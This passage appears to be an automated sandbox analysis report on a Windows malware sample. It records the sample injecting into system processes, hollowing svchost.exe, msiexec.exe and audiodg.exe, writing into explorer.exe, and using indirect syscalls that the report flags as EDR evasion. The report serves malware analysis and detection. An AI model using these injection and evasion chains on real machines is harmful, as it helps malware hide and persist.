                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794832CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,1_2_00007FF794832CB8
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,6_2_00007FF7E52B2CB8
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B4200 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,7_2_0E8B4200
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B3100 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,7_2_0E8B3100
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD52CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,11_2_00007FF7DBD52CB8
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,13_2_00007FF7A91B2CB8
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,14_2_00007FF775AE2CB8
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 8B8AA10Jump to behavior
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeNtUnmapViewOfSection: Indirect: 0x7FF7948323DCJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeNtUnmapViewOfSection: Indirect: 0x7FF7DBD523DC
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8B70000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\Windows\System32\svchost.exeMemory written: PID: 1028 base: 8B70000 value: 4DJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeThread register set: target process: 3092Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeThread register set: target process: 5016Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeThread register set: target process: 6348Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 5484Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 4744Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 6480Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 4084
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 1084
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 5260
                  Sample uses process hollowing technique
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF775AE0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF775AE0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Users\user\Desktop\K6qneGSDSB.exe base address: 7FF7A91B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF775AE0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: BAD4A9010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 8A43997010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE1000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE5000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE7000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE8000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE9000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AEA000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: ACE917A010Jump to behavior
                  Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8B70000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7E0CC0F010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE1000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE5000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE7000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE8000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE9000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AEA000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 5B073AF010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: A571BA010Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: EF113C4010
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE1000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE5000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE7000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE8000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE9000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AEA000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: AA51106010
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: A020884010
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeProcess created: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe "C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exe"
                  Source: explorer.exe, 00000007.00000002.3300553941.0000000009C22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2352212980.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3098529003.0000000009C05000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000007.00000000.2053381911.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000007.00000002.3292560235.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2049685778.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000007.00000000.2049075653.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3291497837.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD6CF90 cpuid 0_2_00007FF79CD6CF90
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,7_2_08B979B4
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,7_2_08B8E9CC
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,7_2_08B9813C
                  Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_08B972AC
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,7_2_08B97428
                  Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,7_2_08B8FF98
                  Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_0E8D7EAC
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0E8D9FF4
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,7_2_0E8D9F40
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,7_2_0E8D85B4
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,7_2_0E8CF5CC
                  Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,7_2_0E8D8D3C
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,7_2_0E8D7D50
                  Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,7_2_0E8D9AD4
                  Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,7_2_0E8D0B98
                  Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,7_2_0E8E0378
                  Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,7_2_0E8DA0F8
                  Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,7_2_0E8D8028
                  Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,7_2_0E8D29BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_00007FF8B836FA48
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: GetProcAddress,GetLocaleInfoW,21_2_00007FF8B831DC20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,21_2_00007FF8B836D2E0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: EnumSystemLocalesW,21_2_00007FF8B836F35C
